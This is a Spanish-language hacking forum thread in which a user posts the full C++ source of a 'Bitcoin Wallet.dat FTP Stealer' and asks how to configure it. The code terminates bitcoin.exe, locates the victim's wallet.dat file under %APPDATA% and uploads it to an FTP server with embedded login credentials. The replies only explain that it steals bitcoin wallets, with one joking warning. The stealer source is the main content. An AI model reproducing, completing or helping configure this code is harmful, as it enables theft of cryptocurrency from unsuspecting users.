comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

como se configura Bitcoin Wallet.dat FTP Stealer Source

  • 2 Respuestas
  • 610 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado drako123

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Agosto 11, 2018, 05:03:48 pm »
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
    // Coded by JuryBen
    // Gimme coins
    // 1LEXm6E4L9Ug9VNpkvXwJiZb61tspRiK7v
     
    #include <windows.h>
    #include <tlhelp32.h>
    #include <tchar.h>
    #include <wininet.h>
    #include <ctime>
    #include <iostream>
    #pragma comment(lib, "wininet")
     
    void killprocess()
            {   
     
                    HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );         // Get the process list snapshot.
                    PROCESSENTRY32 ProcessEntry = { 0 };                                    // Initialize the process entry structure.
                    ProcessEntry.dwSize = sizeof( ProcessEntry );                   // Get the first process info
                    BOOL Return = FALSE;
                    Return = Process32First( hProcessSnapShot,&ProcessEntry );
     
                    int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
                    if (value==0)
                            {
                                    HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID); //Open Process to terminate
                                    TerminateProcess(hProcess,0);
                                    CloseHandle(hProcess); //Close Handle }
                   
                            }
     
            while( Process32Next( hProcessSnapShot, &ProcessEntry ));
            CloseHandle( hProcessSnapShot );
    }
     
    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
           
            killprocess();
            Sleep(40000);
            srand((unsigned)time(NULL));                    // we get time to use for random seed
            int seedone=rand();                                             // seed one
        int seedtwo=rand()*3;                                       // seed two times 3
            int seedboth = seedone + seedtwo;               // combine seeds to ensure random int
                                                                                            // now we need to convert int to char
            char randomseed[99];                                    // make randomseed buffer at 99 to prevent overflow
        itoa(seedboth,randomseed,10);                       // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
                                                                                            // did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name
           
            char* appdata = getenv("APPDATA");              //Gets %Appdata% path
            char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat");  //Bitcoin file to steal
     
            //ftp connection
            HINTERNET hInternet;
            HINTERNET hFtpSession;
            hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
            hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "user@host.com", "bigdickben", INTERNET_SERVICE_FTP, 0, 0);  //ftp host, user, pass
     
            FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
            FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
     
            InternetCloseHandle(hFtpSession);
            InternetCloseHandle(hInternet);
           
            return 0;
    }

Autor: itz me

hola , este programa es un keylogger o miner de bitcoin???

como se configura ?? :)
« Última modificación: Agosto 11, 2018, 05:17:27 pm por drako123 »

Desconectado Rad1us

  • *
  • Underc0der
  • Mensajes: 77
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Email
« Respuesta #1 en: Agosto 13, 2018, 11:25:02 am »
Buenas.
Citar
hola , este programa es un keylogger o miner de bitcoin???
Si le echas un vistazo al codigo veras que mata el proceso bitcoin.exe y luego sube wallet.dat a un server ftp.
por deduccion simple esto te roba la cartera de bitcoins

asi que no hagas cosas malas xD
 
un saludo.
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado KiddArabic

  • *
  • Underc0der
  • Mensajes: 221
  • Actividad:
    15%
  • Reputación 0
  • Vivir sin sueño no es vivir.
    • Ver Perfil
« Respuesta #2 en: Septiembre 02, 2018, 10:22:26 pm »
el codigo no se entiende mucho , muchos de los comentarios no tienen nada que ver. lo que hace es robar alguna wallet o key

 

¿Te gustó el post? COMPARTILO!



Como se investigan las APTs (Amenazas Persistentes Avanzadas)

Iniciado por graphixx

Respuestas: 0
Vistas: 980
Último mensaje Abril 18, 2016, 02:09:09 pm
por graphixx
Qué es un backdoor y cómo se diferencia de un troyano

Iniciado por Gabriela

Respuestas: 0
Vistas: 1538
Último mensaje Julio 25, 2016, 01:59:40 pm
por Gabriela
Cómo eliminar los virus

Iniciado por Nicolas12345

Respuestas: 3
Vistas: 1774
Último mensaje Febrero 09, 2016, 07:17:14 pm
por Nicolas12345
[VIDEO] EDA2 new version (hidden Tear) Ransomware Open Source

Iniciado por GreyCod3

Respuestas: 2
Vistas: 2684
Último mensaje Abril 30, 2016, 05:14:45 pm
por facutota
Hidden Tear el primer Ransomware Open Source

Iniciado por blackdrake

Respuestas: 0
Vistas: 2378
Último mensaje Octubre 11, 2015, 09:49:18 am
por blackdrake